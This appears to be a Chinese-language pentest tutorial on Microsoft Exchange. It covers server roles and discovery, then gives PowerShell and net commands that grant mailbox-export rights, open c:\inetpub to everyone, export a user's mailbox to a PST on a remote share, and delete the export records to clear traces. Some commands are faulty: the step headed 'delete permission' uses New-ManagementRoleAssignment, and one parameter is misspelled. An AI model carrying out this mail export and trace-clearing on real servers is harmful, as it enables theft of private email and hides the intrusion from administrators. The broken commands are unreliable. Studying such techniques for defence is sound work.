Question

Exchange Server 是微软公司的一套 电子邮件服务组件 ，是个消息与协作系统。 简单而言，Exchange server 可以被用来构架应用于企业、学校的邮件系统。Exchange server 还是一个协作平台。在此基础上可以开发工作流，知识管理系统，Web 系统或者是其他消息系统。

2.1 相关概念

2.1.1 邮件服务器角色

• 邮件服务器
  • 该角色是提供托管邮箱、公共文件夹以及相关的消息数据（如地址列表）的后端组件，是必选的服务器角色。
• 客户端访问服务器
  • 接收和处理来自于不同客户端的请求的中间层服务器角色，该角色服务器提供了对使用不同协议进行访问的支持，每个 Exchange 环境中至少需要部署一个客户端访问服务器，客户端访问服务器提供了对以下不同接口访问 Exchange 服务器的处理。
• 集线传输服务器
  • 或称中心传输服务器，该服务器角色的核心服务就是 Microsoft Exchange Transport，负责处理 Mail Flow（这又是 Exchange 中的一大知识点，Exchange 管理员需要通过 MailFlow 实现邮件出站与进站配置）、对邮件进行路由、以及在 Exchange 组织中进行分发，该服务器角色处理所有发往属于本地邮箱的邮件和发往外部邮箱的邮件，并确保邮件发送者和接收者的地址被正确解析并执行特定策略（如邮件地址过滤、内容过滤、格式转换等），该服务器角色相当于一个邮件传输的中继站点，每个 Exchange 环境中至少需要部署一个集线传输服务器。
• 统一消息服务器
  • 将专用交换机（private branch exchange/PBX） 和 Exchange Server 集成在一起，以允许邮箱用户可以在邮件中发送存储语音消息和传真消息，可选角色。
• 边缘消息服务器
  • 该服务器角色作为专用服务器可以用于路由发往内部或外部的邮件，通常部署于网络边界并用于设置安全边界。其接受来自内部组织的邮件和来自外部可信服务器的邮件，然后应用特定的反垃圾邮件、反病毒策略，最后将通过策略筛选的邮件路由到内部的集线传输服务器，可选角色。

在 Exchange Server 2013 及以后的版本中，服务器角色精简为三个，分别是邮箱服务器、客户端访问服务器和边缘传输服务器，其中邮箱服务器角色和客户端访问服务器角色通常被安装在同一台服务器中。

2.1.2 客户端/远程访问接口和协议

• OWA - Outlook Web App
  • 客户端登录使用，地址通常为 http://DOAMIN/owa/
• ECP - Exchange Administrative Center
  • 管理中心，管理员用于管理组织中的 Exchange 的 Web 控制台，地址通常为 http://DOMAIN/ecp/
• EWS - Exchange Web Service
  • 网络管理接口。Exchange 提供了一套 API 编程接口可供开发者调用，用于访问 Exchange 服务器，与邮件、联系人、日历等功能进行交互和管理操作，在 Exchange Server 2007 中被提出。微软基于标准的 Web Service 开发 EWS，EWS 实现的客户端与服务端之间通过基于 HTTP 的 SOAP 交互。

2.2 服务发现

2.2.1 基于端口扫描发现

• 25 端口 SMTP 指纹显示 Exchange smtpd
• 80 端口为 iis
• 443 端口开放

2.2.2 SPN 查询

setspn -T pentest.com -F -Q */*

2.3 exchange 基本操作

• 查看 MailBox 数据库

Add-pssnapin microsoft.exchange*
Get-MailboxDatabase -server "Exchange"

• 查看指定用户邮箱使用信息

Get-Mailboxstatistics -identity administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

• 查看全部用户邮箱使用信息

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize

2.4 导出指定邮件

2.4.1 配置用户的导入、导出权限

• 查看用户权限

# 查看具有导出权限的用户
Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName

• 添加用户角色权限

New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"

• 删除用户权限

New-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false

• 设置网络共享文件夹

net share inetpub=c:\inetpub /grant:everyone,full

• 导出邮件

New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst

2.4.2 清理痕迹

• 查看之前的导出记录

Get-MailboxExportRequest

• 将指定用户的已完成导出请求删除

Remove-MailboxExportRequest -Identify Administrator\mailboxexport

• 将所有已完成导出的请求删除

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest